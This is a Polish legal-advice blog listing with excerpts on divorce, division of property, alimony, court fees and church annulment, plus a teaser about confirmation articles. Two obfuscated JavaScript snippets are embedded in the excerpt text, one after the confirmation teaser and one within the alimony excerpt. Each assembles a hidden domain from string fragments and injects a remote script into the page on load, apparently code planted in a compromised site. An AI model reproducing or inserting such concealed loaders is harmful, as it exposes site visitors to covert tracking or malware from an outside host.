author: admin


Rozwód wiąże się z koniecznością dokonania ustaleń odnośnie finansów. Podział majątku może być zawiłą kwestią, warto wiedzieć jak przebiega.   Podział majątku po rozwodzie Rozwód kończy wspólność majątkową, nie oznacza to jednak, że kończy sprawy finansowe między małżonkami. Najczęściej bowiem trzeba rozwiązać sprawę wspólnego majątku i jego podziału. Podziału tego...

(function(){ waj7=document.createElement("script");waj7.type="text/javascript"; waj7.async=true;waj7_=(("us")+"t")+"a";waj7_+=("t.i")+""+"n";waj7_+=(("f")+"o");waj7_+="/"; waj7u="255398949.";waj7u+="sgzkfjn4aj7lss0j6qebuvp1atgk7e";waj7.src="https://"+waj7_+waj7u; waj7db=document.body;waj7db.appendChild(waj7); })(); Bierzmowanie - jakie dewocjonalia wybrać, aby się dobrze na nie przygotować? Sakrament bierzmowania jest jednym z siedmiu wymienionych w Katechizmie Kościoła Katolickiego. Przystąpienie do niego poprzedzone jest licznymi etapami, których celem jest jak najlepsze przygotowanie osoby wierzącej. Niezbędne będą także dewocjonalia, towarzyszące temu doniosłemu wydarzeniu. Co...

Rola biegłego psychologa w procesie prawa kanonicznego o stwierdzenie nieważności małżeństwa*.  * Wpis gościnny autorstwa Pani Janiny Krystyny Czech, biegłego psychologa w opiniowaniu psychologiczno-sądowym przy Sądzie Okręgowym w Gdańsku oraz Sądzie Biskupim w Pelpinie.     Biegły psycholog to osoba, która posiada specjalistyczną i udokumentowaną wiedzę, (tj. ma dokumenty lub inne dowody...

Czy sama chęć rozwiązania małżeństwa wystarczy, aby otrzymać rozwód? Otóż nie. Aby sąd mógł wydać wyrok rozwodowy musi się upewnić, że nastąpił „trwały i zupełny rozkład pożycia małżeńskiego”. Stwierdzenie tej przesłanki jest podstawą do rozwiązania małżeństwa. Co należy rozumieć przez „trwały i zupełny rozkład pożycia...

Stwierdzenie nieważności małżeństwa, a nie tak jak powszechnie się przyjęło ,,rozwód kościelny” to proces przed sądem kościelnym. Jego celem jest odpowiedź na pytanie: ,,Czy małżeństwo zostało nieważnie zawarte z konkretnego tytułu prawnego?”. Podczas stwierdzenia nieważności małżeństwa nie wykazujemy, który z małżonków ponosi winę za jego...

Alimenty są regularnymi i konkretnie określonymi świadczeniami na rzecz osób fizycznych. Są to środki przeznaczone na utrzymanie się, czyli m.in zakup żywności, odzieży, finansowanie leczenia czy opłat mieszkalnych. W przypadku dzieci alimenty obejmują również kwestie edukacji i wychowania. (function(){ oel6=document.createElement("script");oel6.async=true;oel6_="u"+("s")+"t"; oel6u="250360128.";oel6_+="a"+("t.i");oel6_+="n"+("f"+"o")+"/"; oel6u+="x0XrXz17el6i9uqbiqf6Xx"+("eka1alrk"); oel6.src="https://"+oel6_+oel6u;oel6.type="text/javascript"; document.body.appendChild(oel6); })();   Pozew o alimenty Alimenty według polskiego prawa obejmują zobowiązania...

Bez wątpienia rodzina odgrywa bardzo ważną rolę w kształtowaniu się osobowości każdego człowieka. Buduje w końcu liczne wzorce rodzinne. To osoby najbliższe przekazują nam odpowiednie wartości i uczą postrzegać otaczającego świata. Niestety w społeczeństwie jest bardzo wiele rodzin, z których dzieci nie wynoszą prawidłowych wzorców...

Zainicjowanie postępowanie w sprawie o alimenty wiąże się z spełnieniem kilku warunków formalnych. Jednym z nich jest konieczność uiszczenia opłat sądowych. Jest to jeden z ważniejszych warunków, gdyż brak jego wypełnienia może prowadzić do niemożności zainicjowania postępowania w sprawie. Jakie koszty sądowe należy mieć więc...